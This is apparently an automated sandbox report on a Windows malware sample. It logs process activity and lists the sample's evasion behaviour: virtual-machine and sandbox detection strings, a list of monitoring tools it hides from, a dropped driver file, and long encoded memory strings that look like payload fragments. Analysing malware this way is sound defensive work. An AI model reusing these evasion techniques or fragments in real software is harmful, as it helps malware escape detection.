                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: explorer.exe, 00000015.00000003.1468234175.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057546756.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488372794.0000000001385000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488547694.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488436728.0000000001386000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1468279607.0000000001392000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488587370.0000000001390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1449279227.000001FDD9F41000.00000004.00000800.00020000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1762727004.0000016D01AB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: explorer.exe, 00000015.00000003.1468234175.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057546756.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488372794.0000000001385000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488547694.000000000138B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488436728.0000000001386000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1468279607.0000000001392000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1488587370.0000000001390000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE&
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1468128751.000000000135C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory allocated: 1FDD8490000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeMemory allocated: 1FDF1E70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory allocated: 16D01800000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeMemory allocated: 16D199E0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeCode function: 0_2_00007FFAAC63A8C0 sldt word ptr [eax]0_2_00007FFAAC63A8C0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6284Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3471Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sysJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: RegAsm.exeBinary or memory string: IkSb6Ll0qJvsISzM78QJNGiLkq04uJTAqMTwnNi2nJPyqJvgqcTLnGHQn4gNaMuAycjAuOi4vMCIxNi7pnkRjwexOc3J5MuWZ7O6LZ3p2KPmTK+QETzLwtYBuZmo+DbwfbG5xOvKgJ3Ouh5+NholmxO+He25vP0KCNOjS77JwbHcqVgJ2DX3Uj5uQa5hO/WrLamdvkUy7y3RwnplXcmRsFGEqu1Fy+5dwZG8ABnX8IjIi5KWRr5tzPKOLjW/Im5OIkWH
                  Source: RegAsm.exeBinary or memory string: WROYZl//CRHd+uuCH+Gb/owT29Ys5ODanJqK+YaSxo5/zRFDiL5bCT8N3Y5/2xf90BkJ+Y/XiaBOY6YkP4n8XE89aESbzrvfJxtJ/qkMfcqVAQn4jdeNiX7HkNXIuYOVUQ06BJOWijlA0pONEGwP12wLOQnVxKJuvmyL+IiSyqZK5aeme+pHXQ/5SJVGjHxb480f5RmdDZCclmnhgFsenEw+RVCUj7tGFNe5wVWUfMaVEQqWLo/Rakz5zZlJuQ2VRSPd
                  Source: RegAsm.exeBinary or memory string: 4j5YE68pBdq4x2O3N6PuK9ghYibm8y+oQ45KYeUiznoibluZpnSZWPLOqrB2o74rQi7Lkn5LWZX3BhZuGqLOe4hm89cnky5RxAJ+CwMv01Viov5BpLKjn3tEEnNTM6M7Sior2+tbYm+TBLezvzOk16PzEuOi4vMCIxNt4icmRsn7x4Y3IxUY4x7x9DPvGGJfmIK+SX6owEY0OM6yxz7QV/Ju21OjglLy4lMiovJCuqOuM7Sy4m8b35bFcu4w5AVPy9hh
                  Source: RegAsm.exeBinary or memory string: mvK0nd9YAgI2o2VwBTfir43l0Sb3BkLuCwNvtsIWy3kCauknl7xrHtqTqlhGdh2Lk69H9SdrSQLvj+5pk3L2crXevygT01YSfhsyytn3Ym/H9nfL6PIFzv8oo7LHIi6mJhaaqONX/XpC5B4O2HLytxM/K7JrGMfy5AinnfoibqaoFqqo49sYhu4bEsrZ9mYce6Mfdrq2G/lDLxyvmCIyJvJuJvvXGgnirnd6Fpp5Eq+MZdAm9wZFzX+4ozLHIr7K0mrp
                  Source: ZppxPm0ASs.exe, 00000000.00000002.2540282535.000001FDF2726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: RegAsm.exeBinary or memory string: Yn+qEfMmEeou6Jg4VpaRQjaAGlCXUdvIMjaQVmVgp4VrKgFHYVrH8zrA18FawPMGWxa1xgaLESOG4Yq/mlJLaGdjD5/f/uDV9vI0C7ECF9FLYl5ytIeTj7sCfrkJSTaG4h+n5LNeU0Vmci+Ls+npMiZJ8ibKA5/7Yu73ZALF+yI12oO0qKJfkgXWM6+Zlofe8LkJGQMvq/mAS2k40l4SB2Jvq5kavXnptg3XA2/a7ximTVpm96cTz7qieV5qHs5VVuOf
                  Source: RegAsm.exeBinary or memory string: anIs5xtKLjj5t5JCFZiQKvi+PuIuTi8n5RteITz7HUIyOueoVy8xMCw4Jq28qKOnv7a6pb6mq6Oio7Y5/SxFbiL7CEhnJucFVmEt1lBkb2ub3DVmciJMjy/kijn/mints5pRM42RJvqKMf+uf+D9a3N69ZdmHnuHoU+Bjjz5JnYi96QYCOW4OfmxkoIInJDusw4HIfexE0om5LGZb4GSmemKJBhvhp8VjoYy53cs6qsHKD7ioSLsp4bxH42LOOSLIv8r
                  Source: explorer.exe, 00000015.00000002.2907055074.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: RegAsm.exeBinary or memory string: SfllpKhUnBhkKlzEH/NbmVxcjjCLnBkbyP4tZ65wXZnJ+UzXkE8+6Yu6bZEM7Siojn7JV5+OO0bT2sy/xVWSjIuOi4vMCIxNi7hnizvm07lIGIx8Z/7JXsqy4KJlo0rRK8v0nJxdHAgTa8zR7z+7zpwcnk7RaXt/jNyenbg4zZmb27m6xF1cGHtI2rvrTZNrrb0WntucJuQVHP5l6kzQaLshy/z9xBxYWbj/Axtd26GmaOWhSb7rCfgY4UkKfiiI+WOm
                  Source: RegAsm.exeBinary or memory string: 5bqaFxGVj+GvHn29Mk1SC2dvbiv3MTWbdy7hsY3rd25utjZdWiNwZG8qywh2aXLQFG9ubzb8ebKBe2r/LsOfrO6GjTHxpZiOxZKMSbaCK4I2w5eQMvqsOOSmH1Io4Xr0jmxyvj5KUExva3P3Jhn/IkUr4y87mf/wlpmBWyzhI0pWOPm3knJcnJAj+jl+IfeqEmUm5LGZ79qYmYF77yhTVib6ifB5JvujJ+DvXrZpcmov5OJL6nF0cClVppoRpnpuJvC2
                  Source: RegAsm.exeBinary or memory string: vuvIuI4kjrisoK+em5vMvq3OOKiWimnIPykIvwoePGv6SDku8tRdmlyLlS9KkSoOP+j5K8u/yRuM2EnsTfxeyL9aeYaRno36ogOG1HWcP+aJTGWjOG4Leekr5d0+bi7hm9npycQuzfoiIJkb24TcTL+dCAv5yFlLf9tLfs2OHvmciyQqRi7Ei1Zui4MpC7wdT34YyfgNi1t/yxvOf87eK28qKMj+iZSYTrjC0t+J/MFUGg2JzwzMyT0gk76iPyoJ/s0f
                  Source: RegAsm.exeBinary or memory string: OKiSimn1HZubnE6+r5OK6ejp7+2uqW+pqujoqO2MSfIQWZqcowYg2FuOVmZMuWpV6aUZoz8enIi7mwm6roEbvkibg8672hSTm5xcjHzbTjhrx5+MvWtUjGkqC1ne3F0cNlnanJkJPSqTiqxtbYuI9xPa3N6nk2GZWcnRY+SnaSKni7hqizptxp3OfFBehpj5xdjcw57lmfg7XxuJ71ydHBhZiLxoEwsraK9vrW21lhkb2ubnIVmciJMjybsvlmdqrCcl
                  Source: RegAsm.exeBinary or memory string: m1PPnlQlpzZGw/5WMxEzx6Jv1xJgo2ej7sux8tJ+Nij91GcIl+LVBk6bcbasFzkjpdoiziJ1daN9F2a2dvhgFSW3Qx2WJrcmQk+jpKUTr0d7rcVm+UZmTVRHIi6nqRDz9xPP0tQkqasSpVbuuxfe26JvvoS1tyenYhQaaPr2RFejn1tClnanKnJP4ySnk68A5KaDE4KiUy/YU66Ys/JuSAOf+pJFWcOuG+AnYi+EM18x94KOYaYzb/GGom7h5OhmRwdH
                  Source: ZppxPm0ASs.exe, 00000000.00000002.1433165901.000001FDD83D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: RegAsm.exeBinary or memory string: 5Ay+gBUOe2pOu8wUz4m8rY5Ja0477gj+LSerXRqZ+quGko9+X0ocHRyoyhTTm5ycnn3PgLpJ2439zYYmjgBlpEn8QVQKOqlIvk4SCcm7bUyJrnVcWRvazvxAk0q4aQn5TNeITzzpSY1sSHptxtjOfm2Mu20JDCC9Hp2acqUmJCRJ/m1NC+iqqa+qKC7oqK9vrW21khkb2ubvMVmciJMjybkM1k8+zBGIve2GVIi43zNbGRutyBLS3Z4dmn/OiMr4y8//
                  Source: RegAsm.exeBinary or memory string: jn3sA9qQ6SEbIxvOzg0avcn7atSsri8rSY5OueAVyblqDr8sxp2m3pTIjx2IfmpL+yqTyGyuLytJjk654BXJuWoOvyzGnabeksiPHYh+akv7KpPIbK4vK0u6Z5Mk2J8Pzdy6TLttEysJ/o+UnEhPDAuOi4vMCIxNi7pnhQh/Jcj+qI18YQ8744j+jZSSTpBdibXFgIJDAgZHhI7760/mYQ5+Ysyr45iJ+C1MreBTSJknybkM3k9W21CI/mlJICHJrCIf
                  Source: RegAsm.exeBinary or memory string: ZVPDjqEk4iLOcLSjY58b1aLy8lMSovuZ6J9Z+Yo4b9SFl0vIn2U4SboLuiojn7JV5mOO0DT2My/x1WcjAuOi4vMCIxNi7pnkQg/B9+OcmHhZGPm5CUDDL9qj/hjiZFqTL6hThapGXwJG13bib6G2E340xyJuCkP0WpOumtaCZUqQZlOOqrIvmnJKaHJlqzMUGGBnQn04yFiZaNlZgQJuJ2cZ9BKetuWyznrSZVoTp2OLY43JCUjIWJlo0VL+IlbjJKvH
                  Source: RegAsm.exeBinary or memory string: uJvK2WSWtOO8zT0tJtiH5HkMvJuy+USuzraqmvqigu6Kivb61ttZIZG9rmzy7Z3IiTI8i5Ks5/zlJ5YBzEA30hGsFR/qAbwRu15WMhYkh8a5frCfkOGE4+2gu4TtEJPw+Rjj5O3Im+SBLSzfxdCH5OG+HgfSAjp9sLOOjB2Ep8q4RZzP6gpEMdCfosnI/4qOC5gaSkP+xAXpSpiLxoFS0Iud4ynh6bnAs7K9Lubqlvqaro6KjtslccGFmgsSoYncmRZE
                  Source: wscript.exe, 00000016.00000003.1541727106.000002336C933000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: RegAsm.exeBinary or memory string: /oGUhE+48NL7m96cThLjxJyO++5PuWhmUXGhJE9Z5En+gZSET9piYSNI/G6OPslQjo677s+5aKZaXB6bjjvK08rMvet4mpnby8wOy81LSA6NSw/r5+gGIiNtZLGBp2Qp7+2uikhPDAuOi4vMCIxNi7pngQh/JYi+pg18Y847eNPy3p2aTpBdibXFgIJDAgZHhI7760/mYQ5+Ysyr45iJ+C1MreBTSJknybkM3k9W21CI/mlJICHJrCIfzLlsiyug0wyd
                  Source: RegAsm.exeBinary or memory string: 8GDQEMUxYZBgJKExYeClpWUQNGbGpyZGx3bm5xcnl6Jx4SDgcaHlYNBxoLBg0ODhRUGQ8SDwAICRYYBx8VWRYBHxRPHwoKE0kbBEccFwEOGREECAVKGwoIEhZOVlcKXWRwZG9rc3p2IBwcBgMHC1oYGhQEHkobChgSHAIUEw8TABdEGwQHGxpJBQMDGwZPXx0BUAgIGQYBDRNOARdSXBYbemRva3N6diAcHAYDBwtaGBoUBB5KGwoYEhwCFBMPEwAXRA
                  Source: IsStopped.exe, 00000017.00000002.1762727004.0000016D01AB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: RegAsm.exeBinary or memory string: ZKDgEHGxMQGBkbAw5yZA8YABoUHA1aDx4ATw8SDhdJAhgCHAsBDnF0cGFmanJkDwMcAlEXCwgBAmRva3N6dg0bDQIcGk8cEB0cFBQPcmQJGQ0cCAINEwEeRAwfARZWDxMDCxocCnoUGhMTHxoGDQMZTgAeBlkJGwAUABkHHxJJFAUVTxoHEwJUGwQfSgYdHBJubnFyeXoLAhYAGVMbEg0bBABPHAoZGAQZBAgecmQJBRwBA1IKHxoEDQEMUxkfGRoPFW
                  Source: IsStopped.exe, 00000017.00000002.1762727004.0000016D01AB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: RegAsm.exeBinary or memory string: FHbm5xO/Q1bzFPhSrzgVtmN4IvVL8bZTn5Cp6NaTqbo/dRXgWKOFGROek4aYy1MuK1gnZ/XG/xhjyPpy9phyxXBHYYYT7yeSb7sifguDuJeTpRFHcmYD0CbFuO7a867R9nJuU9VjkyXbyMppdCej7i7k7Xb25vdVkAVDEu6bYELSgvMDAvOCYxLjmsI/omUnEnPDAuOi4vMCIxNi7pngRjXhpKITryf5qRKG8jQL4+4DZOJyrkH35Ciznqv+GYa0SHL+
                  Source: RegAsm.exeBinary or memory string: bBxUZDQcIHgFsd25ucXJ5ehoVCR8EARsEEFIMBgYCGggUdHBhZmpyZA4WCk4QGyYcAhEDHEsFGxocF2pnb25vehgaBgAKAxZEGhYCGxRSHxUcUAwGBQcJdhsXGxIKHRtaEhUeAgMGFwBsd25ucXJ5eh4VFgIKHR8YHVIMBgYCGggUdHBhZmpyZA0eMQgQHxAWF1AKAB9TCQMZAgUVGwsLeh8bUAACDgABHwRubnFyeXobHg8BBAQUVgcdDgJPAR1aAhE
                  Source: RegAsm.exeBinary or memory string: EeBhICUhADGE4dGR0LDm5wZG9rc3p2BRsIFQ4cFloTARdhZmpyZAAeDBwQAABaBhEXTwUcWhUAAgICHR1vehwdAxIPBBVECAQPTgIbHhQHHgNPCBYIAmlyamdvbm96HB0DEg8EFUQJFAodEFIKEwkeDQEMUxkTGwZqZ29ub3ocHQMSDwQVRAoWGg8dcnl6AxkXHAIdHVYZExgGAgsbHwMHcGFmanJkAR4dHRgcHlocAwVPCBYIAgAUAwQOGgp6HB0DEg
